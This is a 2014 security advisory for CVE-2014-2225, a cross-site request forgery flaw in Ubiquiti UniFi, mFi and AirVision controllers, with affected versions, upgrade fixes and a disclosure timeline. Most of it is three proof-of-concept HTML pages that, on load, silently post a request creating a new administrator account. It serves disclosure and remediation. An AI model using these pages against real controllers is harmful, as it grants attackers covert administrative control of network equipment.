UniFi / mFi / AirVision Cross Site Request Forgery

`-----------  
Vendor:  
-----------  
Ubiquiti Networks (http://www.ubnt.com/)  
  
-----------------------------------------  
Affected Products/Versions:  
-----------------------------------------  
UniFi Controller v2.4.6  
mFi Controller v2.0.15  
AirVision Controller v2.1.3  
Note: Previous versions may be affected  
  
-----------------  
Description:  
-----------------  
Title: Cross-site Request Forgery (CSRF)  
CVE: CVE-2014-2225  
CWE: http://cwe.mitre.org/data/definitions/352.html  
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html  
Researcher: Seth Art - @sethsec  
  
---------------  
UniFi POC:  
---------------  
  
<html>  
<head>  
<script>  
function sendCSRF()  
{  
var url_base = "https://192.168.0.106:8443/api/add/admin"  
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"  
  
var xmlhttp;  
xmlhttp = new XMLHttpRequest();  
xmlhttp.open("POST", url_base, true);  
xmlhttp.setRequestHeader("Accept","*/*");  
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;  
charset=UTF-8");  
xmlhttp.withCredentials= "true";  
xmlhttp.send(post_data);  
}  
  
</script>  
</head>  
<body>  
<h1>CSRF POC</h1>  
Sending CSRF Payload!!!  
<body onload="sendCSRF()">  
</body>  
  
-------------  
mFi POC:  
-------------  
<html>  
<head>  
<script>  
function sendCSRF()  
{  
var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"  
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"  
  
var xmlhttp;  
xmlhttp = new XMLHttpRequest();  
xmlhttp.open("POST", url_base, true);  
xmlhttp.setRequestHeader("Accept","*/*");  
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;  
charset=UTF-8");  
xmlhttp.withCredentials= "true";  
xmlhttp.send(post_data);  
}  
  
</script>  
</head>  
<body>  
<h1>CSRF POC</h1>  
Sending CSRF Payload!!!  
<body onload="sendCSRF()">  
</body>  
  
  
--------------------  
AirVision POC:  
--------------------  
<html>  
<head>  
<script>  
function sendCSRF()  
{  
var url_base = "https://192.168.0.106:7443/api/v2.0/admin"  
var post_data="{\”name\”:\”csrf\”,\”email\”:\”[email protected]\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”  
  
var xmlhttp;  
xmlhttp = new XMLHttpRequest();  
xmlhttp.open("POST", url_base, true);  
xmlhttp.setRequestHeader("Accept","*/*");  
xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");  
xmlhttp.withCredentials= "true";  
xmlhttp.send(post_data);  
}  
  
</script>  
</head>  
<body>  
<h1>CSRF POC</h1>  
Sending CSRF Payload!!!  
<body onload="sendCSRF()">  
</body>  
  
  
  
-------------  
Solution:  
-------------  
UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater  
mFi Controller - Upgrade to mFi Controller v2.0.24 or greater  
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:  
The application name changed from AirVision to UniFi Video)  
  
-----------------------------  
Disclosure Timeline:  
-----------------------------  
2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products  
2014-02-17: Ubiquiti acknowledges and requests details  
2014-02-17: Report with POC sent to Ubiquiti  
2014-02-19: Asked Ubiquiti to confirm receipt of report  
2014-02-19: Ubiquti confirms receipt of report and existence of the  
vulnerabilities  
2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product  
2014-02-19: Ubiquti confirms receipt of AirVision report and existence  
of the vulnerability  
2014-02-28: CVE-2014-2225 assigned  
2014-03-12: Requested status update  
2014-03-27: Requested status update  
2014-04-07: Requested status update, mention that we might need to  
bring in a CERT  
2014-04-09: Ubiquiti provides timeline for solution  
2014-04-18: UniFi Video 3.0.1 is released  
2014-05-30: Requested a status update on the remaining two products  
2014-06-12: Requested a status update on the remaining two products  
2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released  
2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor  
2014-07-24: Public disclosure  
  
  
`